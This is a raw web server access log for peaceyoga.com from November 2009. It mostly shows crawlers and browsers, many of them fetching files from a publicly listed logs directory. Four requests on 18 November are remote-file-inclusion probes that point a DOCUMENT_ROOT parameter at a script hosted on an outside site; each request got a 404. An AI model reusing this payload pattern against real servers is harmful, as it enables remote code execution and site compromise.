174.129.121.101 - - [17/Nov/2009:01:44:35 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.peaceyoga.com"
174.129.121.101 - - [17/Nov/2009:01:44:35 -0800] "GET /logs/access_081101.log HTTP/1.0" 200 4529 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.peaceyoga.com"
67.195.113.240 - - [17/Nov/2009:02:12:59 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [17/Nov/2009:02:13:00 -0800] "GET /logs/access_081201.log HTTP/1.0" 200 100743 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
93.158.145.27 - - [17/Nov/2009:13:29:34 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
67.195.113.240 - - [17/Nov/2009:18:47:50 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [17/Nov/2009:18:47:50 -0800] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
168.215.215.195 - - [17/Nov/2009:19:42:29 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Eric Osgood/Nutch-1.0 (Nutch spiderman; http://www.calpoly.edu/~eosgood ; MyEmail)" "www.peaceyoga.com"
168.215.215.195 - - [17/Nov/2009:19:42:30 -0800] "GET / HTTP/1.0" 200 900 "-" "Eric Osgood/Nutch-1.0 (Nutch spiderman; http://www.calpoly.edu/~eosgood ; MyEmail)" "www.peaceyoga.com"
168.215.215.195 - - [17/Nov/2009:19:42:30 -0800] "GET / HTTP/1.1" 200 916 "-" "Java/1.6.0_16" "www.peaceyoga.com"
67.195.113.240 - - [18/Nov/2009:01:48:41 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [18/Nov/2009:01:48:44 -0800] "GET /logs/access_070330.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.169 - - [18/Nov/2009:03:24:03 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.169 - - [18/Nov/2009:03:24:03 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.113.240 - - [18/Nov/2009:03:42:07 -0800] "GET /logs/access_090801.log HTTP/1.0" 200 5021 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
93.158.145.27 - - [18/Nov/2009:09:45:14 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
67.195.113.240 - - [18/Nov/2009:10:27:56 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
207.114.187.194 - - [18/Nov/2009:14:20:20 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Eric Osgood/Nutch-1.0 (Nutch spiderman; http://www.calpoly.edu/~eosgood ; MyEmail)" "www.peaceyoga.com"
207.114.187.194 - - [18/Nov/2009:14:20:20 -0800] "GET / HTTP/1.0" 200 900 "-" "Eric Osgood/Nutch-1.0 (Nutch spiderman; http://www.calpoly.edu/~eosgood ; MyEmail)" "www.peaceyoga.com"
207.114.187.194 - - [18/Nov/2009:14:20:20 -0800] "GET / HTTP/1.1" 200 916 "-" "Java/1.6.0_16" "www.peaceyoga.com"
174.129.75.209 - - [18/Nov/2009:16:39:48 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "SheenBot/SheenBot-1.0.0 (Sheen web crawler)" "www.peaceyoga.com"
174.129.75.209 - - [18/Nov/2009:16:39:48 -0800] "GET / HTTP/1.0" 200 900 "-" "SheenBot/SheenBot-1.0.0 (Sheen web crawler)" "www.peaceyoga.com"
81.169.167.146 - - [18/Nov/2009:21:18:17 -0800] "GET /logs/access.log/logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
81.169.167.146 - - [18/Nov/2009:21:18:17 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
81.169.167.146 - - [18/Nov/2009:21:18:17 -0800] "GET /logs/logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
81.169.167.146 - - [18/Nov/2009:21:18:23 -0800] "GET /logs/access_090301.log/logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.whinercentral.com/modules/Neos_Chronos/modules/admin/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.peaceyoga.com"
67.195.111.169 - - [19/Nov/2009:01:19:28 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.169 - - [19/Nov/2009:01:19:28 -0800] "GET /?M=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
122.174.99.85 - - [19/Nov/2009:04:43:41 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.peaceyoga.com"
67.195.113.240 - - [19/Nov/2009:06:06:52 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [19/Nov/2009:06:06:53 -0800] "GET /logs/access_080905.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [19/Nov/2009:07:49:19 -0800] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [19/Nov/2009:08:23:21 -0800] "GET /?M=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [19/Nov/2009:11:39:02 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [19/Nov/2009:13:40:51 -0800] "GET /logs/access_090401.log HTTP/1.0" 200 929 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [19/Nov/2009:16:37:20 -0800] "GET /logs/?S=A HTTP/1.0" 200 3931 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [19/Nov/2009:16:45:07 -0800] "GET /logs/access_090101.log HTTP/1.0" 200 3048 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
203.92.64.97 - - [19/Nov/2009:18:56:30 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.peaceyoga.com"
203.92.64.97 - - [19/Nov/2009:18:56:32 -0800] "GET /favicon.ico HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.peaceyoga.com"
67.195.113.240 - - [19/Nov/2009:22:15:57 -0800] "GET /logs/access_080801.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [19/Nov/2009:22:48:41 -0800] "GET /logs/access_090501.log HTTP/1.0" 200 66905 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
76.14.50.34 - - [19/Nov/2009:22:55:00 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
76.14.50.34 - - [19/Nov/2009:22:55:00 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9" "www.peaceyoga.com"
67.195.113.240 - - [20/Nov/2009:07:29:21 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [20/Nov/2009:07:29:21 -0800] "GET /logs/access_090901.log HTTP/1.0" 200 42289 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [20/Nov/2009:16:58:48 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [20/Nov/2009:16:58:48 -0800] "GET /logs/access_071201.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [20/Nov/2009:18:51:13 -0800] "GET /logs/access_080301.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.169 - - [20/Nov/2009:19:26:39 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.111.169 - - [20/Nov/2009:19:26:40 -0800] "GET /?D=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
174.0.68.59 - - [20/Nov/2009:20:04:22 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5" "www.peaceyoga.com"
174.0.68.59 - - [20/Nov/2009:20:04:23 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5" "www.peaceyoga.com"
174.0.68.59 - - [20/Nov/2009:20:04:26 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5" "www.peaceyoga.com"
174.0.68.59 - - [20/Nov/2009:20:04:27 -0800] "GET /_private/ HTTP/1.1" 403 - "http://www.peaceyoga.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5" "www.peaceyoga.com"
204.15.39.10 - - [20/Nov/2009:20:13:41 -0800] "GET /logs/access.log HTTP/1.1" 200 60313 "http://ca.search.yahoo.com/search?p=%22access.log%22+%22HTTP%2F1.0%22&ei=UTF-8&fr=yfp-t-501&xargs=0&pstart=1&b=351" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.01" "www.peaceyoga.com"
204.15.39.10 - - [20/Nov/2009:20:13:47 -0800] "GET /logs/ HTTP/1.1" 200 3947 "-" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.01" "www.peaceyoga.com"
204.15.39.10 - - [20/Nov/2009:20:13:47 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.peaceyoga.com/logs/" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.01" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:34:24 -0800] "GET /logs/ HTTP/1.1" 200 3947 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:34:38 -0800] "GET /logs/access.log HTTP/1.1" 200 61115 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:34:41 -0800] "GET /logs/access_081001.log HTTP/1.1" 200 71599 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:34:43 -0800] "GET /logs/access_081002.log HTTP/1.1" 200 3570 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:34:44 -0800] "GET /logs/access_081031.log HTTP/1.1" 200 84619 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:34:47 -0800] "GET /logs/access_081101.log HTTP/1.1" 200 4529 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:34:48 -0800] "GET /logs/access_081201.log HTTP/1.1" 200 100743 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:34:52 -0800] "GET /logs/access_081231.log HTTP/1.1" 200 85700 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:34:54 -0800] "GET /logs/access_090101.log HTTP/1.1" 200 3048 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:34:55 -0800] "GET /logs/access_090201.log HTTP/1.1" 200 117565 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:34:59 -0800] "GET /logs/access_090301.log HTTP/1.1" 200 73030 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:01 -0800] "GET /logs/access_090329.log HTTP/1.1" 200 57439 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:04 -0800] "GET /logs/access_090330.log HTTP/1.1" 200 3322 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:04 -0800] "GET /logs/access_090331.log HTTP/1.1" 200 1128 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:04 -0800] "GET /logs/access_090401.log HTTP/1.1" 200 929 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:05 -0800] "GET /logs/access_090501.log HTTP/1.1" 200 66905 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:06 -0800] "GET /logs/access_090531.log HTTP/1.1" 200 63535 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:09 -0800] "GET /logs/access_090601.log HTTP/1.1" 200 1166 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:10 -0800] "GET /logs/access_090701.log HTTP/1.1" 200 45555 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:13 -0800] "GET /logs/access_090731.log HTTP/1.1" 200 64906 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:22 -0800] "GET /logs/access_090801.log HTTP/1.1" 200 5021 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:22 -0800] "GET /logs/access_090901.log HTTP/1.1" 200 42289 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:24 -0800] "GET /logs/access_091001.log HTTP/1.1" 200 54267 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:25 -0800] "GET /logs/access_091031.log HTTP/1.1" 200 52295 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
204.15.39.12 - - [20/Nov/2009:20:35:27 -0800] "GET /logs/access_091101.log HTTP/1.1" 200 3641 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.peaceyoga.com"
67.195.113.240 - - [20/Nov/2009:23:08:16 -0800] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
119.63.198.53 - - [21/Nov/2009:00:21:33 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.peaceyoga.com"
67.195.113.240 - - [21/Nov/2009:06:28:14 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [21/Nov/2009:06:28:14 -0800] "GET /logs/access_090201.log HTTP/1.0" 200 117565 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [21/Nov/2009:06:30:07 -0800] "GET /logs/access_090330.log HTTP/1.0" 200 3322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [21/Nov/2009:06:36:20 -0800] "GET /logs/access_090531.log HTTP/1.0" 200 63535 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [21/Nov/2009:07:48:47 -0800] "GET /logs/access_081002.log HTTP/1.0" 200 3570 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [21/Nov/2009:07:52:18 -0800] "GET /logs/access_080329.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [21/Nov/2009:10:48:38 -0800] "GET /logs/access_090731.log HTTP/1.0" 200 64906 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [21/Nov/2009:14:29:14 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [21/Nov/2009:14:29:14 -0800] "GET /?D=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [21/Nov/2009:15:53:36 -0800] "GET /logs/access_080401.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
93.158.145.27 - - [21/Nov/2009:18:04:23 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
74.110.88.6 - - [21/Nov/2009:19:37:10 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "peaceyoga.com"
74.110.88.6 - - [21/Nov/2009:19:37:10 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "peaceyoga.com"
98.154.93.191 - - [21/Nov/2009:23:49:16 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "peaceyoga.com"
98.154.93.191 - - [21/Nov/2009:23:49:17 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "peaceyoga.com"
67.195.113.240 - - [22/Nov/2009:01:16:37 -0800] "GET /logs/access_080731.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [22/Nov/2009:02:20:03 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [22/Nov/2009:02:20:04 -0800] "GET /logs/access_080901.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
93.158.145.27 - - [22/Nov/2009:17:01:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
67.195.113.223 - - [22/Nov/2009:20:09:46 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.113.223 - - [22/Nov/2009:20:09:49 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "peaceyoga.com"
67.195.113.240 - - [23/Nov/2009:02:04:15 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [23/Nov/2009:02:04:16 -0800] "GET /logs/access_081031.log HTTP/1.0" 200 84619 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [23/Nov/2009:06:57:42 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [23/Nov/2009:06:57:42 -0800] "GET /logs/access_090301.log HTTP/1.0" 200 73030 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
93.158.145.27 - - [23/Nov/2009:11:37:29 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.peaceyoga.com"
66.249.71.169 - - [23/Nov/2009:12:49:36 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.peaceyoga.com"
67.195.113.240 - - [23/Nov/2009:16:07:36 -0800] "GET /logs/access_081231.log HTTP/1.0" 200 85700 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [23/Nov/2009:17:56:30 -0800] "GET /logs/access_081101.log HTTP/1.0" 200 4529 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
75.84.150.13 - - [23/Nov/2009:21:37:50 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "www.peaceyoga.com"
75.84.150.13 - - [23/Nov/2009:21:37:51 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.peaceyoga.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "www.peaceyoga.com"
67.195.113.240 - - [24/Nov/2009:08:29:14 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [24/Nov/2009:08:29:14 -0800] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
174.129.121.101 - - [24/Nov/2009:14:20:07 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.peaceyoga.com"
174.129.121.101 - - [24/Nov/2009:14:20:07 -0800] "GET / HTTP/1.0" 200 900 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.peaceyoga.com"
67.195.113.240 - - [24/Nov/2009:15:30:54 -0800] "GET /logs/access_080501.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
119.63.198.15 - - [24/Nov/2009:22:53:02 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.peaceyoga.com"
67.195.113.240 - - [26/Nov/2009:02:58:51 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.240 - - [26/Nov/2009:02:58:51 -0800] "GET /logs/access_070701.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.231 - - [26/Nov/2009:06:11:03 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.113.231 - - [26/Nov/2009:06:11:04 -0800] "GET /logs/access_080905.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
67.195.111.39 - - [26/Nov/2009:09:09:26 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.peaceyoga.com"
